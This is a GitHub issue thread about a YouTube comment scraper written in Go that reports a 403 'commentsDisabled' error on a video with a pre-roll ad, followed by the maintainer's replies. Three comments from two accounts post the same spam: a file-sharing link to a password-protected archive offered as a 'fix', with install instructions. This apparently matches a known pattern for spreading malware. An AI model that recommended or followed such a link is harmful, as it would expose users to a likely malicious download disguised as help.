### ISSUE TITLE
no comments on videos with Ads ?

### ISSUE THREAD

**Issue by gedw99** [itzfolen/yt-comment-scraper#1]
https://www.youtube.com/watch?v=446E-r0rXHI  works. it has no ads

https://www.youtube.com/watch?v=5taWjLgI8w0 fails. It has a pre roll ad. comments are NOT disabled.

```sh
go run . 5taWjLgI8w0
2024/08/31 17:27:58 Error fetching comments: googleapi: Error 403: The video identified by the <code><a href="/youtube/v3/docs/commentThreads/list#videoId">videoId</a></code> parameter has disabled comments., commentsDisabled
exit status 1
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by itzfolen** [comment]
Hello! Thank you for taking the time to look into this issue.
I don't know the exact reason why the comment availability is incorrect and I can't fix it because this app uses the YouTube API and not the HTML parser. When I tested the app on other videos, I didn't encounter this error.
If you have any other complaints or suggestions regarding the application, you can leave them.

itzfolen

**Comment by itzfolen** [comment]
Nice to see you again! 
I use uBlock and I don't have ads on YouTube or other sites.

**Comment by itzfolen** [comment]
Hello! 
I don't think this is a bug of the YouTube platform, I think that maybe some option in the video settings can affect the availability of downloading comments and I don't think that Google support will solve the problem with the video where problems are observed. In any case, thank you for your time and help with this problem!
